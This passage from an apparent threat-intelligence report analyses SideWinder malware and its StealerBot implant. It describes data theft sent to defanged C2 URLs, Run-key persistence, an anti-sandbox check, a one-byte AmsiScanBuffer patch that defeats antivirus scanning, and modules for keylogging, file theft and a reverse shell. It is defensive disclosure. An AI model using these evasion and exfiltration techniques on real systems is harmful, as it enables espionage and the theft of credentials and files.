Specifically, they collect:</p> <ul> <li>Current username;</li> <li>Processor names and number of cores;</li> <li>Physical disk name and size;</li> <li>The values of the TotalVirtualMemorySize and TotalVisibleMemorySize properties;</li> <li>Current hostname;</li> <li>Local IP address;</li> <li>Installed OS;</li> <li>Architecture.</li> </ul> <p>The collected data are then encoded in base64 and concatenated with a C2 URL embedded in the code, inside a variable named &#8220;data&#8221;.</p> <div id="crayon-67446d0bc5e32523100545" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" 
data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> hxxps://dynamic.nactagovpk[.]org/735e3a_download?data=&lt;stoleninfo&gt;</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e32523100545-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e32523100545-1"><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//dynamic.nactagovpk[.]org/735e3a_download?data=&lt;stoleninfo&gt;</span></div></div></td> </tr> </table> </div> </div><p> The malware has several C2 URLs embedded in the code, all of them encoded with base64 using a custom alphabet:</p> <div id="crayon-67446d0bc5e36955663099" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div 
class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> C2_URL_1 = hxxps://dynamic.nactagovpk[.]org/735e3a_download C2_URL_2 = hxxps://dynamic.nactagovpk[.]org/0df7b2_download C2_URL_3 = hxxps://dynamic.nactagovpk[.]org/27419a_download C2_URL_4 = hxxps://dynamic.nactagovpk[.]org/ef1c4f_download</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e36955663099-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e36955663099-2">2</div><div class="crayon-num" data-line="crayon-67446d0bc5e36955663099-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e36955663099-4">4</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e36955663099-1"><span class="crayon-i">C2_URL_1</span><span class="crayon-h"> </span>=<span class="crayon-h"> 
</span><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//dynamic.nactagovpk[.]org/735e3a_download</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e36955663099-2"><span class="crayon-i">C2_URL_2</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//dynamic.nactagovpk[.]org/0df7b2_download</span></div><div class="crayon-line" id="crayon-67446d0bc5e36955663099-3"><span class="crayon-i">C2_URL_3</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//dynamic.nactagovpk[.]org/27419a_download</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e36955663099-4"><span class="crayon-i">C2_URL_4</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//dynamic.nactagovpk[.]org/ef1c4f_download</span></div></div></td> </tr> </table> </div> </div><p> The malware sends the collected information to one of the C2 servers selected according to the specific infection routine. The server response should be a payload with various configuration values.</p> <p>The set of values may vary depending on the infection routine. The malware parses the received values and assigns them to local variables. In most cases the variable names cannot be obtained from the malware code. However, in one particular infection routine the attacker used debug strings that allowed us to obtain most of these names. 
The table below contains the full list of possible configuration values.</p> <table width="100%"> <tbody> <tr> <td width="30%"><strong>Variable name</strong></td> <td width="70%"><strong>Description</strong></td> </tr> <tr> <td>MALWARE_DIRECTORY</td> <td>Directory path where all the malicious files are stored.</td> </tr> <tr> <td>LOAD_DLL_URL_X64</td> <td>URL used to download the malicious library for 64-bit systems.</td> </tr> <tr> <td>LOAD_DLL_URL_X86</td> <td>URL used to download the malicious library for 32-bit systems.</td> </tr> <tr> <td>LOAD_DLL_URL</td> <td>URL used to download the malicious library. Some infection routines do not check the architecture.</td> </tr> <tr> <td>APP_DLL_URL</td> <td>URL used to download the encrypted payload.</td> </tr> <tr> <td>HIJACK_EXE_URL</td> <td>URL used to download the legitimate application used to sideload the malicious library.</td> </tr> <tr> <td>RUN_KEY</td> <td>Name of the Windows Registry value that will be created to maintain persistence.</td> </tr> <tr> <td>HIJACK_EXE_NAME</td> <td>Name of the legitimate application.</td> </tr> <tr> <td>LOAD_DLL_NAME</td> <td>Name of the malicious library.</td> </tr> <tr> <td>MOD_LOAD_DLL_URL</td> <td>URL used to download an unknown library that is saved in the MALWARE_DIRECTORY as &#8220;IPHelper.dll&#8221;.</td> </tr> </tbody> </table> <p>The payload is XORed twice. The keys are the first 32 bytes at the beginning of the payload.</p> <p>During execution, the malware logs the current infection status by sending GET requests to the C2. The analyzed sample used C2_URL_4 for this purpose. 
The request includes at least one variable named &#8220;data&#8221;, whose value indicates the infection status.</p> <table width="100%"> <tbody> <tr> <td width="30%"><strong>Variable</strong></td> <td width="70%"><strong>Description</strong></td> </tr> <tr> <td>?data=1</td> <td>Downloads completed.</td> </tr> <tr> <td>?data=2</td> <td>Persistence point created.</td> </tr> <tr> <td>?data=3&amp;m=str</td> <td>Error. It also contains a variable &#8220;m&#8221; with information about the error.</td> </tr> <tr> <td>?data=4</td> <td>Infection completed, but the next stage is not running.</td> </tr> <tr> <td>?data=5</td> <td>Infection completed and the next stage is running.</td> </tr> </tbody> </table> <p>The technique used to maintain persistence varies according to the infection routine selected by the malware, but generally relies on the creation of new registry values under the HKCU Run key or the creation of Windows Scheduled Tasks.</p> <p>For example:</p> <div id="crayon-67446d0bc5e38976832854" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div 
class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> RegKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegValue: xcschemer (MALWARE_DIRECTORY) RegValueData: %AppData%\xcschemer\vssvc.exe (HIJACK_EXE_PATH)</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e38976832854-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e38976832854-2">2</div><div class="crayon-num" data-line="crayon-67446d0bc5e38976832854-3">3</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e38976832854-1"><span class="crayon-i">RegKey</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">HKCU</span><span class="crayon-sy">\</span><span class="crayon-i">SOFTWARE</span><span class="crayon-sy">\</span><span class="crayon-i">Microsoft</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">CurrentVersion</span><span class="crayon-sy">\</span><span 
class="crayon-e">Run</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e38976832854-2"><span class="crayon-i">RegValue</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-e">xcschemer</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-i">MALWARE_DIRECTORY</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-67446d0bc5e38976832854-3"><span class="crayon-i">RegValueData</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">AppData</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-i">xcschemer</span><span class="crayon-sy">\</span><span class="crayon-i">vssvc</span><span class="crayon-sy">.</span><span class="crayon-e">exe</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-i">HIJACK_EXE_PATH</span><span class="crayon-sy">)</span></div></div></td> </tr> </table> </div> </div> <h2 id="backdoor-loader-module">Backdoor loader module</h2> <p>The infection scheme described in the previous paragraph results in the installation of a malicious library that is sideloaded by a legitimate, digitally signed application. The library acts as a loader that retrieves an encrypted payload dropped by ModuleInstaller, decrypts it and loads it in memory.</p> <p>The Backdoor loader module has been observed since 2020; we covered it in our private APT reports. It has remained almost the same over the years. 
It was recently updated by the attacker, but the main difference is that old variants are configured to load the encrypted file using a specific filename embedded in the program, whereas the latest variants were designed to enumerate all the files in the current directory and load those without an extension.</p> <p>The library is usually highly obfuscated using the <a href="https://web.archive.org/web/20150907034947/http:/www.inf.u-szeged.hu/~akiss/pub/pdf/laszlo_obfuscating.pdf" target="_blank" rel="noopener">Control Flow Flattening</a> technique. In addition, the strings, method names, and resource names are randomly replaced with long strings, which makes the decoded code difficult to analyze. Moreover, some relevant strings are stored inside a resource embedded in the program and encrypted with an XOR layer and Triple DES.</p> <p>The malware also contains anti-sandbox techniques. It takes the current date and time and puts the thread to sleep for 100 seconds. Sandboxes usually skip sleep functions because malware often uses them to introduce long execution delays and evade detection. Upon awakening, the malware retrieves the current date and time again and checks whether the elapsed time is less than 90.5 seconds. If it is, execution terminates.</p> <p>The malware also attempts to avoid detection by patching the AmsiScanBuffer function in &#8220;amsi.dll&#8221; (Windows Antimalware Scan Interface). Specifically, it loads the &#8220;amsi.dll&#8221; library and parses the export directory to find the &#8220;AmsiScanBuffer&#8221; function. In this function, it changes the memory protection flags to modify instructions at RVA 0x337D to always return error code 0x80070057 (E_INVALIDARG – Invalid Argument). 
This change forces the &#8220;Amsi&#8221; protection to always return a scan result equal to 0, which is usually interpreted as AMSI_RESULT_CLEAN.</p> <div id="attachment_114134" style="width: 850px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151630/SideWinder_2024_08.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114134" class="size-full wp-image-114134" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151630/SideWinder_2024_08.png" alt="AmsiScanBuffer before patching" width="840" height="243" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151630/SideWinder_2024_08.png 840w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151630/SideWinder_2024_08-300x87.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151630/SideWinder_2024_08-768x222.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151630/SideWinder_2024_08-740x214.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151630/SideWinder_2024_08-800x231.png 800w" sizes="(max-width: 840px) 100vw, 840px" /></a><p id="caption-attachment-114134" class="wp-caption-text">AmsiScanBuffer before patching</p></div> <div id="attachment_114135" style="width: 850px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151701/SideWinder_2024_09.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114135" class="size-full wp-image-114135" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151701/SideWinder_2024_09.png" alt="AmsiScanBuffer after patching" width="840" height="243" 
srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151701/SideWinder_2024_09.png 840w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151701/SideWinder_2024_09-300x87.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151701/SideWinder_2024_09-768x222.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151701/SideWinder_2024_09-740x214.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151701/SideWinder_2024_09-800x231.png 800w" sizes="(max-width: 840px) 100vw, 840px" /></a><p id="caption-attachment-114135" class="wp-caption-text">AmsiScanBuffer after patching</p></div> <p>The patched code is only one byte in size: the malware changes 0x74, which corresponds to the JZ (Jump if zero) instruction, to 0x75, which corresponds to JNZ (Jump if not zero). The jump should be made when the buffer provided as input to the AmsiScanBuffer function is invalid. With the modification, the jump will be made for all valid buffers.</p> <p>After patching AmsiScanBuffer, the malware performs a startup operation to achieve its main goal, which is to load another payload from the encrypted file. First, it enumerates files in the current directory and tries to find a file without the character &#8216;.&#8217; in the file name (i.e., without an extension). Then, if the file is found, it uses the first 16 bytes at the beginning of the file as the key and decodes the rest of the data using the XOR algorithm. Finally, it loads the data as a .NET assembly and invokes the &#8220;Program.ctor&#8221; method.</p> <h2 id="stealerbot">StealerBot</h2> <p>StealerBot is a name assigned by the attacker to a modular implant developed with .NET to perform espionage activities. We never observed any of the implant components on the filesystem. They are loaded into memory by the Backdoor loader module. 
Prior to being loaded, the binary is stored in an encrypted file.</p> <p>The implant consists of different modules loaded by the main &#8220;Orchestrator&#8221;, which is responsible for communicating with the C2 and executing and managing the plugins. During the investigation, we discovered several plugins that were uploaded to compromised hosts and were used to:</p> <ul> <li>Install additional malware;</li> <li>Capture screenshots;</li> <li>Log keystrokes;</li> <li>Steal passwords from browsers;</li> <li>Intercept RDP credentials;</li> <li>Steal files;</li> <li>Start a reverse shell;</li> <li>Phish Windows credentials;</li> <li>Escalate privileges by bypassing UAC.</li> </ul> <p>Module IDs are embedded both in the modules themselves and in an encrypted configuration file. The Orchestrator uses them to manage the components. It exchanges messages/commands with the modules, and can handle specific messages to kill or remove modules with a particular ID.</p> <table width="100%"> <tbody> <tr> <td width="30%"><strong>Module ID</strong></td> <td width="70%"><strong>Description</strong></td> </tr> <tr> <td>0xca</td> <td>Keylogger</td> </tr> <tr> <td>0xcb</td> <td>Live Console</td> </tr> <tr> <td>0xd0</td> <td>Screenshot Grabber</td> </tr> <tr> <td>0xd4</td> <td>File Stealer</td> </tr> <tr> <td>0xd6</td> <td>UACBypass</td> </tr> <tr> <td>0xe0</td> <td>RDP Credential Stealer</td> </tr> <tr> <td>0xe1</td> <td>Token Grabber</td> </tr> <tr> <td>??</td> <td>Credential Phisher</td> </tr> </tbody> </table> <h3 id="stealerbot-orchestrator">StealerBot Orchestrator</h3> <p>The Orchestrator is usually loaded by the Backdoor loader module and is responsible for communicating with the C2 server, and for executing and managing plugins. It periodically connects to two URLs to download modules provided by the attacker and to upload files with stolen information. 
It also exchanges messages with the loaded module that can be used to provide or modify configuration properties and unload specific components from the memory.</p> <p>Once loaded into memory, the malware decodes a resource embedded in the Orchestrator called &#8220;Default&#8221;. The resource contains a configuration file with the following structure:</p> <table width="100%"> <tbody> <tr> <td width="25%"><strong>Parameter</strong></td> <td width="25%"><strong>Parameter type</strong></td> <td width="50%"><strong>Description</strong></td> </tr> <tr> <td>Config path</td> <td>String</td> <td>Location used to store the configuration file after first execution</td> </tr> <tr> <td>Data directory</td> <td>String</td> <td>Directory where the plugins store the output files that will be uploaded to the remote C2</td> </tr> <tr> <td>C2 Modules</td> <td>String</td> <td>URL used to communicate with C2 server and retrieve additional plugins</td> </tr> <tr> <td>C2 Gateway</td> <td>String</td> <td>URL used to upload files generated by modules</td> </tr> <tr> <td>C2 Modules Sleeptime</td> <td>Integer</td> <td>Sleep time between communications with &#8220;C2 Modules&#8221;</td> </tr> <tr> <td>C2 Gateway Sleeptime</td> <td>Integer</td> <td>Sleep time between communications with &#8220;C2 Gateway&#8221;</td> </tr> <tr> <td>RSA_Key</td> <td>String</td> <td>RSA key used to encrypt communication with the C2 server</td> </tr> <tr> <td>Number of plugins</td> <td>Integer</td> <td>Number of plugins embedded in the configuration</td> </tr> <tr> <td>Modules</td> <td>Array</td> <td>Array which contains the modules</td> </tr> </tbody> </table> <p>The configuration can embed multiple modules. By default, the array is usually empty, but after initial execution, the malware creates a copy of the configuration in a local file and keeps it updated with information retrieved from the C2 server.</p> <p>After parsing the configuration, the malware loads all the modules specified in the file. 
It then launches two threads to communicate with the remote C2 server. The first thread is used to communicate with the first URL that we dubbed &#8220;C2 Modules&#8221;, which is used to obtain new modules. The second thread is used to communicate with the URL we called &#8220;C2 Gateway&#8221;, which is used to upload the data generated by the modules.</p> <p>The malware communicates with the C2 Modules server using GET requests. Before sending the request, it adds an &#8220;x&#8221; value that contains the list of modules already loaded by the agent.</p> <div id="crayon-67446d0bc5e3b088725839" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div 
class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> &amp;x[moduleId_1,moduleId_2,moduleId_3,etc.]"</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e3b088725839-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e3b088725839-1"><span class="crayon-h">&amp;x</span><span class="crayon-sy">[</span><span class="crayon-i">moduleId_1</span><span class="crayon-sy">,</span><span class="crayon-i">moduleId_2</span><span class="crayon-sy">,</span><span class="crayon-i">moduleId_3</span><span class="crayon-sy">,</span><span class="crayon-i">etc</span><span class="crayon-sy">.</span><span class="crayon-sy">]</span>"</div></div></td> </tr> </table> </div> </div><p> The server responds with a message composed of two parts, the header and the payload. 
Each part has a specific structure with different information:</p> <div id="attachment_114136" style="width: 554px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/09115341/SideWinder_2024-10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114136" class="size-full wp-image-114136" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/09115341/SideWinder_2024-10.png" alt="Message structure" width="544" height="387" /></a><p id="caption-attachment-114136" class="wp-caption-text">Message structure</p></div> <p>Each message is digitally signed with the RSA private key owned by the server-side attacker, and the signature is stored in the &#8220;rgbSignature&#8221; value. The Orchestrator uses the &#8220;RSACryptoServiceProvider.VerifyHash&#8221; method to verify that the provided digital signature is valid.</p> <p>The header is encoded with the same XOR algorithm used to encode or decode the configuration file. The payload is compressed using Gzip and encrypted using AES. The header contains the information needed to identify the module, decrypt the payload, and verify the received data.</p> <p>When the module is loaded, the Orchestrator invokes the module main method, passing two arguments: the module ID and a pipe handle. The pipe is used to maintain communication between the module and the Orchestrator.</p> <p>The modules can send various messages to the Orchestrator to get or modify the configuration, send log messages, and terminate module execution. 
The messages function like commands, have a specific ID, and can include arguments.</p> <p>The first byte of the message is its ID, which defines the request type:</p> <table width="100%"> <tbody> <tr> <td width="15%"><strong>Message ID</strong></td> <td width="85%"><strong>Description</strong></td> </tr> <tr> <td>0</td> <td><strong>Get settings:</strong> the Orchestrator creates a copy of the current configuration and sends it to the module.</td> </tr> <tr> <td>1</td> <td><strong>Update config:</strong> the module provides a new configuration and the Orchestrator updates the current configuration values and stores them in the local file.</td> </tr> <tr> <td>2</td> <td><strong>Unload current module:</strong> the Orchestrator should unload the current module from the memory and close the related pipes.</td> </tr> <tr> <td>3</td> <td><strong>Unload module by ID:</strong> the Orchestrator should unload a module with the ID specified in the received request.</td> </tr> <tr> <td>4</td> <td><strong>Remove startup:</strong> the Orchestrator should remove a module from the local configuration. 
The module ID is specified in the received request.</td> </tr> <tr> <td>5</td> <td><strong>Remove current module from the configuration:</strong> the Orchestrator should remove the current module ID from the local configuration.</td> </tr> <tr> <td>6</td> <td><strong>Terminate current thread: </strong>the Orchestrator stops timers, pipes and removes the current module from the current list of modules.</td> </tr> <tr> <td>7</td> <td><strong>Save log message: </strong>the Orchestrator saves a log message using the current module ID.</td> </tr> <tr> <td>8</td> <td><strong>Save log message:</strong> the Orchestrator saves a log message using the specified module ID.</td> </tr> <tr> <td>9</td> <td><strong>Get output folder configuration.</strong></td> </tr> <tr> <td>10</td> <td><strong>Get C2 Modules URL:</strong> the Orchestrator shares the current C2 Modules URL with the module.</td> </tr> <tr> <td>11</td> <td><strong>Get C2 Gateway URL:</strong> the Orchestrator shares the current C2 Gateway URL with the module.</td> </tr> <tr> <td>12</td> <td><strong>Get RSA_Key public key.</strong></td> </tr> </tbody> </table> <h3 id="modules">Modules</h3> <h4 id="keylogger">Keylogger</h4> <p>This module uses the &#8220;SetWindowsHookEx&#8221; function specified in the &#8220;user32.dll&#8221; library to install a hook procedure and monitor low-level keyboard and mouse input events. The malware can log keystrokes, mouse events, Windows clipboard contents, and the title of the currently active window.</p> <h4 id="screenshot-grabber">Screenshot Grabber</h4> <p>This module periodically grabs screenshots of the primary screen.</p> <h4 id="file-stealer">File Stealer</h4> <p>The File Stealer module collects files from specific directories. It also scans removable drives to steal files with specific extensions. 
By default, the list of extensions is as follows:</p> <div id="crayon-67446d0bc5e3e004867871" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> .ppk,.doc,.docx,.xls,.xlsx,.ppt,.zip,.pdf</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px 
!important;"><div class="crayon-num" data-line="crayon-67446d0bc5e3e004867871-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e3e004867871-1"><span class="crayon-sy">.</span><span class="crayon-i">ppk</span><span class="crayon-sy">,</span><span class="crayon-sy">.</span><span class="crayon-i">doc</span><span class="crayon-sy">,</span><span class="crayon-sy">.</span><span class="crayon-i">docx</span><span class="crayon-sy">,</span><span class="crayon-sy">.</span><span class="crayon-i">xls</span><span class="crayon-sy">,</span><span class="crayon-sy">.</span><span class="crayon-i">xlsx</span><span class="crayon-sy">,</span><span class="crayon-sy">.</span><span class="crayon-i">ppt</span><span class="crayon-sy">,</span><span class="crayon-sy">.</span><span class="crayon-i">zip</span><span class="crayon-sy">,</span><span class="crayon-sy">.</span><span class="crayon-i">pdf</span></div></div></td> </tr> </table> </div> </div><p> Based on these values, we can conclude that this tool was developed to perform espionage activities by collecting files that usually contain sensitive information, such as Microsoft Office documents. It also searches for PPK files, which is the extension of files created by PuTTY to store private keys. 
PuTTY is an SSH and Telnet client commonly used on Windows OS to access remote systems. A stolen .ppk file gives the attacker the same SSH access as its owner to every host that trusts the key (immediately, if the key has no passphrase), so revoking and rotating any SSH keys found on an affected system should be part of remediation.
